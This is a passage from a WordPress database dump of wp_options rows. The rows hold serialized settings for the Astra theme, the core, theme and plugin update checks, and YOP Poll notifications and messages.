ies";a:0:{}s:34:"show_new_content_type_notification";b:0;}', 'yes'),
(168, 'current_theme', 'Astra Child', 'yes'),
(169, 'theme_mods_astra', 'a:4:{i:0;b:0;s:18:"nav_menu_locations";a:0:{}s:18:"custom_css_post_id";i:-1;s:16:"sidebars_widgets";a:2:{s:4:"time";i:1681117023;s:4:"data";a:9:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:5:{i:0;s:7:"block-2";i:1;s:7:"block-3";i:2;s:7:"block-4";i:3;s:7:"block-5";i:4;s:7:"block-6";}s:13:"header-widget";a:0:{}s:15:"footer-widget-1";a:0:{}s:15:"footer-widget-2";a:0:{}s:24:"advanced-footer-widget-1";a:0:{}s:24:"advanced-footer-widget-2";a:0:{}s:24:"advanced-footer-widget-3";a:0:{}s:24:"advanced-footer-widget-4";a:0:{}}}}', 'no'),
(170, 'theme_switched', '', 'yes'),
(161, 'finished_updating_comment_type', '1', 'yes'),
(74812, '_site_transient_update_core', 'O:8:"stdClass":4:{s:7:"updates";a:1:{i:0;O:8:"stdClass":10:{s:8:"response";s:6:"latest";s:8:"download";s:59:"https://downloads.wordpress.org/release/wordpress-6.5.2.zip";s:6:"locale";s:5:"en_US";s:8:"packages";O:8:"stdClass":5:{s:4:"full";s:59:"https://downloads.wordpress.org/release/wordpress-6.5.2.zip";s:10:"no_content";s:70:"https://downloads.wordpress.org/release/wordpress-6.5.2-no-content.zip";s:11:"new_bundled";s:71:"https://downloads.wordpress.org/release/wordpress-6.5.2-new-bundled.zip";s:7:"partial";s:0:"";s:8:"rollback";s:0:"";}s:7:"current";s:5:"6.5.2";s:7:"version";s:5:"6.5.2";s:11:"php_version";s:5:"7.0.0";s:13:"mysql_version";s:3:"5.0";s:11:"new_bundled";s:3:"6.4";s:15:"partial_version";s:0:"";}}s:12:"last_checked";i:1712735107;s:15:"version_checked";s:5:"6.5.2";s:12:"translations";a:0:{}}', 'no'),
(74873, '_transient_timeout_astra-theme-cron-test-ok', '1712773709', 'no'),
(74874, '_transient_astra-theme-cron-test-ok', '1', 'no'),
(74715, '_site_transient_timeout_php_check_990bfacb848fa087bcfc06850f5e4447', '1713254182', 'no'),
(74716, '_site_transient_php_check_990bfacb848fa087bcfc06850f5e4447', 'a:5:{s:19:"recommended_version";s:3:"7.4";s:15:"minimum_version";s:3:"7.0";s:12:"is_supported";b:1;s:9:"is_secure";b:1;s:13:"is_acceptable";b:1;}', 'no'),
(73209, '_site_transient_update_themes', 'O:8:"stdClass":5:{s:12:"last_checked";i:1712735107;s:7:"checked";a:4:{s:11:"astra-child";s:5:"1.0.0";s:5:"astra";s:6:"4.6.11";s:16:"twentytwentyfour";s:3:"1.1";s:17:"twentytwentythree";s:3:"1.4";}s:8:"response";a:0:{}s:9:"no_update";a:3:{s:5:"astra";a:6:{s:5:"theme";s:5:"astra";s:11:"new_version";s:6:"4.6.11";s:3:"url";s:35:"https://wordpress.org/themes/astra/";s:7:"package";s:54:"https://downloads.wordpress.org/theme/astra.4.6.11.zip";s:8:"requires";s:3:"5.3";s:12:"requires_php";s:3:"5.3";}s:16:"twentytwentyfour";a:6:{s:5:"theme";s:16:"twentytwentyfour";s:11:"new_version";s:3:"1.1";s:3:"url";s:46:"https://wordpress.org/themes/twentytwentyfour/";s:7:"package";s:62:"https://downloads.wordpress.org/theme/twentytwentyfour.1.1.zip";s:8:"requires";s:3:"6.4";s:12:"requires_php";s:3:"7.0";}s:17:"twentytwentythree";a:6:{s:5:"theme";s:17:"twentytwentythree";s:11:"new_version";s:3:"1.4";s:3:"url";s:47:"https://wordpress.org/themes/twentytwentythree/";s:7:"package";s:63:"https://downloads.wordpress.org/theme/twentytwentythree.1.4.zip";s:8:"requires";s:3:"6.1";s:12:"requires_php";s:3:"5.6";}}s:12:"translations";a:0:{}}', 'no'),
(73210, '_site_transient_update_plugins', 'O:8:"stdClass":5:{s:12:"last_checked";i:1712735107;s:8:"response";a:0:{}s:12:"translations";a:0:{}s:9:"no_update";a:6:{s:19:"akismet/akismet.php";O:8:"stdClass":10:{s:2:"id";s:21:"w.org/plugins/akismet";s:4:"slug";s:7:"akismet";s:6:"plugin";s:19:"akismet/akismet.php";s:11:"new_version";s:5:"5.3.2";s:3:"url";s:38:"https://wordpress.org/plugins/akismet/";s:7:"package";s:56:"https://downloads.wordpress.org/plugin/akismet.5.3.2.zip";s:5:"icons";a:2:{s:2:"2x";s:60:"https://ps.w.org/akismet/assets/icon-256x256.png?rev=2818463";s:2:"1x";s:60:"https://ps.w.org/akismet/assets/icon-128x128.png?rev=2818463";}s:7:"banners";a:2:{s:2:"2x";s:63:"https://ps.w.org/akismet/assets/banner-1544x500.png?rev=2900731";s:2:"1x";s:62:"https://ps.w.org/akismet/assets/banner-772x250.png?rev=2900731";}s:11:"banners_rtl";a:0:{}s:8:"requires";s:3:"5.8";}s:27:"astra-hooks/astra-hooks.php";O:8:"stdClass":10:{s:2:"id";s:25:"w.org/plugins/astra-hooks";s:4:"slug";s:11:"astra-hooks";s:6:"plugin";s:27:"astra-hooks/astra-hooks.php";s:11:"new_version";s:5:"1.0.2";s:3:"url";s:42:"https://wordpress.org/plugins/astra-hooks/";s:7:"package";s:60:"https://downloads.wordpress.org/plugin/astra-hooks.1.0.2.zip";s:5:"icons";a:2:{s:2:"2x";s:64:"https://ps.w.org/astra-hooks/assets/icon-256x256.png?rev=2810871";s:2:"1x";s:64:"https://ps.w.org/astra-hooks/assets/icon-128x128.png?rev=2810871";}s:7:"banners";a:2:{s:2:"2x";s:67:"https://ps.w.org/astra-hooks/assets/banner-1544x500.png?rev=2810871";s:2:"1x";s:66:"https://ps.w.org/astra-hooks/assets/banner-772x250.png?rev=2810871";}s:11:"banners_rtl";a:0:{}s:8:"requires";s:3:"4.4";}s:23:"loginizer/loginizer.php";O:8:"stdClass":10:{s:2:"id";s:23:"w.org/plugins/loginizer";s:4:"slug";s:9:"loginizer";s:6:"plugin";s:23:"loginizer/loginizer.php";s:11:"new_version";s:5:"1.8.4";s:3:"url";s:40:"https://wordpress.org/plugins/loginizer/";s:7:"package";s:52:"https://downloads.wordpress.org/plugin/loginizer.zip";s:5:"icons";a:2:{s:2:"2x";s:62:"https://ps.w.org/loginizer/assets/icon-256x256.png?rev=1381093";s:2:"1x";s:62:"https://ps.w.org/loginizer/assets/icon-128x128.png?rev=1381093";}s:7:"banners";a:2:{s:2:"2x";s:65:"https://ps.w.org/loginizer/assets/banner-1544x500.jpg?rev=2668035";s:2:"1x";s:64:"https://ps.w.org/loginizer/assets/banner-772x250.jpg?rev=2668037";}s:11:"banners_rtl";a:0:{}s:8:"requires";s:3:"3.0";}s:23:"wordfence/wordfence.php";O:8:"stdClass":10:{s:2:"id";s:23:"w.org/plugins/wordfence";s:4:"slug";s:9:"wordfence";s:6:"plugin";s:23:"wordfence/wordfence.php";s:11:"new_version";s:6:"7.11.5";s:3:"url";s:40:"https://wordpress.org/plugins/wordfence/";s:7:"package";s:59:"https://downloads.wordpress.org/plugin/wordfence.7.11.5.zip";s:5:"icons";a:2:{s:2:"1x";s:54:"https://ps.w.org/wordfence/assets/icon.svg?rev=2070865";s:3:"svg";s:54:"https://ps.w.org/wordfence/assets/icon.svg?rev=2070865";}s:7:"banners";a:2:{s:2:"2x";s:65:"https://ps.w.org/wordfence/assets/banner-1544x500.jpg?rev=2124102";s:2:"1x";s:64:"https://ps.w.org/wordfence/assets/banner-772x250.jpg?rev=2124102";}s:11:"banners_rtl";a:0:{}s:8:"requires";s:3:"3.9";}s:27:"wp-super-cache/wp-cache.php";O:8:"stdClass":10:{s:2:"id";s:28:"w.org/plugins/wp-super-cache";s:4:"slug";s:14:"wp-super-cache";s:6:"plugin";s:27:"wp-super-cache/wp-cache.php";s:11:"new_version";s:6:"1.12.0";s:3:"url";s:45:"https://wordpress.org/plugins/wp-super-cache/";s:7:"package";s:64:"https://downloads.wordpress.org/plugin/wp-super-cache.1.12.0.zip";s:5:"icons";a:2:{s:2:"2x";s:67:"https://ps.w.org/wp-super-cache/assets/icon-256x256.png?rev=1095422";s:2:"1x";s:67:"https://ps.w.org/wp-super-cache/assets/icon-128x128.png?rev=1095422";}s:7:"banners";a:2:{s:2:"2x";s:70:"https://ps.w.org/wp-super-cache/assets/banner-1544x500.png?rev=1082414";s:2:"1x";s:69:"https://ps.w.org/wp-super-cache/assets/banner-772x250.png?rev=1082414";}s:11:"banners_rtl";a:0:{}s:8:"requires";s:3:"6.3";}s:24:"wordpress-seo/wp-seo.php";O:8:"stdClass":10:{s:2:"id";s:27:"w.org/plugins/wordpress-seo";s:4:"slug";s:13:"wordpress-seo";s:6:"plugin";s:24:"wordpress-seo/wp-seo.php";s:11:"new_version";s:4:"22.4";s:3:"url";s:44:"https://wordpress.org/plugins/wordpress-seo/";s:7:"package";s:61:"https://downloads.wordpress.org/plugin/wordpress-seo.22.4.zip";s:5:"icons";a:2:{s:2:"1x";s:58:"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=2363699";s:3:"svg";s:58:"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=2363699";}s:7:"banners";a:2:{s:2:"2x";s:69:"https://ps.w.org/wordpress-seo/assets/banner-1544x500.png?rev=2643727";s:2:"1x";s:68:"https://ps.w.org/wordpress-seo/assets/banner-772x250.png?rev=2643727";}s:11:"banners_rtl";a:2:{s:2:"2x";s:73:"https://ps.w.org/wordpress-seo/assets/banner-1544x500-rtl.png?rev=2643727";s:2:"1x";s:72:"https://ps.w.org/wordpress-seo/assets/banner-772x250-rtl.png?rev=2643727";}s:8:"requires";s:3:"6.3";}}s:7:"checked";a:6:{s:19:"akismet/akismet.php";s:5:"5.3.2";s:27:"astra-hooks/astra-hooks.php";s:5:"1.0.2";s:23:"loginizer/loginizer.php";s:5:"1.8.4";s:23:"wordfence/wordfence.php";s:6:"7.11.5";s:27:"wp-super-cache/wp-cache.php";s:6:"1.12.0";s:24:"wordpress-seo/wp-seo.php";s:4:"22.4";}}', 'no'),
(28177, 'widget_yop_poll_widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(73020, '_transient_is_multi_author', '0', 'yes'),
(28175, 'yop_poll_version', '6.5.24', 'yes'),
(28176, 'yop_poll_settings', 's:3646:"a:4:{s:7:"general";a:4:{s:6:"i-date";s:19:"2023-06-21 09:29:39";s:10:"show-guide";s:3:"yes";s:11:"remove-data";s:2:"no";s:25:"use-custom-headers-for-ip";s:2:"no";}s:13:"notifications";a:2:{s:8:"new-vote";a:5:{s:9:"from-name";s:20:"happy polling result";s:10:"from-email";s:22:"web21@freshgasflow.com";s:10:"recipients";s:22:"web21@freshgasflow.com";s:7:"subject";s:22:"web21@freshgasflow.com";s:7:"message";s:289:"There is a new vote for %POLL-NAME%\n									Here are the details\n\n									[QUESTION]\n									Question - %QUESTION-TEXT%\n									Answer - %ANSWER-VALUE%\n									[/QUESTION]\n\n									[CUSTOM_FIELDS]\n									%CUSTOM_FIELD_NAME% - %CUSTOM_FIELD_VALUE%\n									[/CUSTOM_FIELDS]\n								";}s:25:"automatically-reset-votes";a:5:{s:9:"from-name";s:14:"Your Name Here";s:10:"from-email";s:23:"Your Email Address Here";s:10:"recipients";s:0:"";s:7:"subject";s:37:"Stats for %POLL-NAME% on %RESET-DATE%";s:7:"message";s:342:"Poll - %POLL-NAME%\n									Reset Date - %RESET-DATE%\n									\n									[RESULTS]\n									%QUESTION-TEXT%\n									[ANSWERS]\n									%ANSWER-TEXT% - %ANSWER-VOTES% votes - %ANSWER-PERCENTAGES%\n									[/ANSWERS]\n									\n									[OTHER-ANSWERS]\n									%ANSWER-TEXT% - %ANSWER-VOTES% votes\n									[/OTHER-ANSWERS]\n									[/RESULTS]";}}s:12:"integrations";a:6:{s:9:"reCaptcha";a:3:{s:7:"enabled";s:2:"no";s:8:"site-key";s:0:"";s:10:"secret-key";s:0:"";}s:20:"reCaptchaV2Invisible";a:3:{s:7:"enabled";s:2:"no";s:8:"site-key";s:0:"";s:10:"secret-key";s:0:"";}s:11:"reCaptchaV3";a:4:{s:7:"enabled";s:2:"no";s:8:"site-key";s:0:"";s:10:"secret-key";s:0:"";s:17:"min-allowed-score";s:0:"";}s:8:"hCaptcha";a:3:{s:7:"enabled";s:2:"no";s:8:"site-key";s:0:"";s:10:"secret-key";s:0:"";}s:8:"facebook";a:2:{s:7:"enabled";s:2:"no";s:6:"app-id";s:0:"";}s:6:"google";a:3:{s:7:"enabled";s:2:"no";s:6:"app-id";s:0:"";s:10:"app-secret";s:0:"";}}s:8:"messages";a:4:{s:7:"captcha";a:6:{s:17:"accessibility-alt";s:10:"Sound icon";s:19:"accessibility-title";s:57:"Accessibility option: listen to a question and answer it!";s:25:"accessibility-description";s:74:"Type below the [STRONG]answer[/STRONG] to what you hear. Numbers or words:";s:11:"explanation";s:42:"Click or touch the [STRONG]ANSWER[/STRONG]";s:11:"refresh-alt";s:19:"Refresh/reload icon";s:13:"refresh-title";s:56:"Refresh/reload: get new images and accessibility option!";}s:7:"buttons";a:4:{s:9:"anonymous";s:14:"Anonymous Vote";s:9:"wordpress";s:22:"Sign in with WordPress";s:8:"facebook";s:21:"Sign in with Facebook";s:6:"google";s:19:"Sign in with Google";}s:6:"voting";a:15:{s:10:"poll-ended";s:38:"This poll is no longer accepting votes";s:16:"poll-not-started";s:36:"This poll is not accepting votes yet";s:21:"already-voted-on-poll";s:23:"Thank you for your vote";s:12:"invalid-poll";s:12:"Invalid Poll";s:19:"no-answers-selected";s:18:"No answer selected";s:20:"min-answers-required";s:49:"At least {min_answers_allowed} answer(s) required";s:20:"max-answers-required";s:49:"A max of {max_answers_allowed} answer(s) accepted";s:19:"no-answer-for-other";s:23:"No other answer entered";s:25:"no-value-for-custom-field";s:31:"{custom_field_name} is required";s:19:"consent-not-checked";s:42:"You must agree to our terms and conditions";s:19:"no-captcha-selected";s:19:"Captcha is required";s:18:"not-allowed-by-ban";s:16:"Vote not allowed";s:20:"not-allowed-by-block";s:16:"Vote not allowed";s:20:"not-allowed-by-limit";s:16:"Vote not allowed";s:9:"thank-you";s:23:"Thank you for your vote";}s:7:"results";a:4:{s:11:"single-vote";s:4:"vote";s:14:"multiple-votes";s:5:"votes";s:13:"single-answer";s:6:"answer";s:16:"multiple-answers";s:7:"answers";}}}";', 'yes'),
(31368, 'widget_akismet_widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(28051, 'astra_partials_config_cache', 'a:2:{s:8:"settings";a:770:{s:35:"astra-settings[button-preset-style]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:40:"astra-settings[theme-button-color-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[theme-button-bg-color-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:47:"astra-settings[theme-button-border-color-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[theme-button-border-group-border-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:56:"astra-settings[theme-button-border-group-border-h-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:20:"sanitize_alpha_color";}}s:28:"astra-settings[button-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:30:"astra-settings[button-h-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:31:"astra-settings[button-bg-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:33:"astra-settings[button-bg-h-color]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:36:"astra-settings[theme-button-padding]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";i:15;s:5:"right";i:30;s:6:"bottom";i:15;s:4:"left";i:30;}s:6:"tablet";a:4:{s:3:"top";i:14;s:5:"right";i:28;s:6:"bottom";i:14;s:4:"left";i:28;}s:6:"mobile";a:4:{s:3:"top";i:12;s:5:"right";i:24;s:6:"bottom";i:12;s:4:"left";i:24;}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:53:"astra-settings[theme-button-border-group-border-size]";a:4:{s:7:"default";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:36:"astra-settings[button-radius-fields]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:34:"astra-settings[site-content-width]";a:4:{s:7:"default";i:1200;s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:42:"astra-settings[narrow-container-max-width]";a:4:{s:7:"default";i:750;s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:37:"astra-settings[different-retina-logo]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:38:"astra-settings[ast-header-retina-logo]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";s:11:"esc_url_raw";}s:37:"astra-settings[different-mobile-logo]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:34:"astra-settings[mobile-header-logo]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";s:11:"esc_url_raw";}s:48:"astra-settings[ast-header-responsive-logo-width]";a:4:{s:7:"default";a:3:{s:7:"desktop";s:0:"";s:6:"tablet";s:0:"";s:6:"mobile";s:0:"";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:45:"astra-settings[display-site-title-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:1;s:6:"tablet";i:1;s:6:"mobile";i:1;}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:47:"astra-settings[display-site-tagline-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";i:0;s:6:"tablet";i:0;s:6:"mobile";i:0;}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:33:"astra-settings[logo-title-inline]";a:4:{s:7:"default";i:1;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:47:"astra-settings[site-identity-title-color-group]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:39:"astra-settings[header-color-site-title]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[header-color-h-site-title]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[header-color-site-tagline]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:30:"astra-settings[site-icon-link]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:26:"astra-settings[blog-width]";a:4:{s:7:"default";s:7:"default";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:30:"astra-settings[blog-max-width]";a:4:{s:7:"default";i:1200;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:33:"astra-settings[blog-post-content]";a:4:{s:7:"default";s:7:"excerpt";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:54:"astra-settings[archive-post-content-structure-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:35:"astra-settings[blog-post-structure]";a:4:{s:7:"default";a:2:{i:0;s:5:"image";i:1;s:10:"title-meta";}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:25:"astra-settings[blog-meta]";a:4:{s:7:"default";a:3:{i:0;s:8:"comments";i:1;s:8:"category";i:2;s:6:"author";}s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:35:"astra-settings[blog-meta-date-type]";a:4:{s:7:"default";s:9:"published";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:37:"astra-settings[blog-meta-date-format]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:29:"section-blog-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:33:"astra-settings[blog-single-width]";a:4:{s:7:"default";s:7:"default";s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:37:"astra-settings[blog-single-max-width]";a:4:{s:7:"default";i:1200;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:51:"astra-settings[section-blog-single-spacing-divider]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[single-post-outside-spacing]";a:4:{s:7:"default";a:6:{s:7:"desktop";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"tablet";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:6:"mobile";a:4:{s:3:"top";s:0:"";s:5:"right";s:0:"";s:6:"bottom";s:0:"";s:4:"left";s:0:"";}s:12:"desktop-unit";s:2:"px";s:11:"tablet-unit";s:2:"px";s:11:"mobile-unit";s:2:"px";}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";a:2:{i:0;s:26:"Astra_Customizer_Sanitizes";i:1;s:27:"sanitize_responsive_spacing";}}s:36:"section-blog-single-ast-context-tabs";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:35:"astra-settings[site-sidebar-layout]";a:4:{s:7:"default";s:10:"no-sidebar";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:34:"astra-settings[site-sidebar-width]";a:4:{s:7:"default";i:30;s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:46:"astra-settings[site-sidebar-width-description]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";s:0:"";}s:37:"astra-settings[ast-sidebar-pro-items]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:35:"astra-settings[site-content-layout]";a:4:{s:7:"default";s:23:"content-boxed-container";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:36:"astra-settings[surface-colors-title]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:53:"astra-settings[site-layout-outside-bg-obj-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";a:11:{s:16:"background-color";s:25:"var(--ast-global-color-4)";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:15:"background-type";s:0:"";s:16:"background-media";s:0:"";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"tablet";a:11:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:15:"background-type";s:0:"";s:16:"background-media";s:0:"";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"mobile";a:11:{s:16:"background-color";s:0:"";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:15:"background-type";s:0:"";s:16:"background-media";s:0:"";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:41:"astra-settings[content-bg-obj-responsive]";a:4:{s:7:"default";a:3:{s:7:"desktop";a:11:{s:16:"background-color";s:25:"var(--ast-global-color-5)";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:15:"background-type";s:0:"";s:16:"background-media";s:0:"";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"tablet";a:11:{s:16:"background-color";s:25:"var(--ast-global-color-5)";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:15:"background-type";s:0:"";s:16:"background-media";s:0:"";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}s:6:"mobile";a:11:{s:16:"background-color";s:25:"var(--ast-global-color-5)";s:16:"background-image";s:0:"";s:17:"background-repeat";s:6:"repeat";s:19:"background-position";s:13:"center center";s:15:"background-size";s:4:"auto";s:21:"background-attachment";s:6:"scroll";s:15:"background-type";s:0:"";s:16:"background-media";s:0:"";s:12:"overlay-type";s:0:"";s:13:"overlay-color";s:0:"";s:16:"overlay-gradient";s:0:"";}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:43:"astra-settings[ast-site-layout-button-link]";a:4:{s:7:"default";s:0:"";s:4:"type";s:6:"option";s:9:"transport";s:7:"refresh";s:17:"sanitize_callback";b:0;}s:36:"astra-settings[global-color-palette]";a:4:{s:7:"default";a:1:{s:7:"palette";a:9:{i:0;s:7:"#046bd2";i:1;s:7:"#045cb4";i:2;s:7:"#1e293b";i:3;s:7:"#334155";i:4;s:7:"#f9fafb";i:5;s:7:"#FFFFFF";i:6;s:7:"#e2e8f0";i:7;s:7:"#cbd5e1";i:8;s:7:"#94a3b8";}}s:4:"type";s:6:"option";s:9:"transport";s:11:"postMessage";s:17:"sanitize_callback";b:0;}s:20:"astra-color-palettes";a:4:{s:7:"default";a:2:{s:14:"currentPalette";s:9:"palette_1";s:8:"palettes";a:3:{s:9:"palette_1";a:9:{i:0;s:7:"#046bd2";i:1;s:7:"#045cb4";i:2;s:7:"#1e293b";i:3;s:7:"#334155";i:4;s:7:"#f9fafb";i:5;s:7:"#FFFFFF";i:6;s:7:"#e2e8f0";i:7;s:7:"#cbd5e1";i:8;s:7:"#94a3b8";}s:9:"palette_2";a:9:{i:0;s:7:"#0170B9";i:1;s:7:"#3a3a3a";i:2;s:7:"#3a3a3a";i:3;s:7:"#4B4F58";i:4;s:7:"#F5F5F5";i:5;s:7:"#FFFFFF";i:6;s:7:"#F2F5F7";i:7;s:7:"#424242"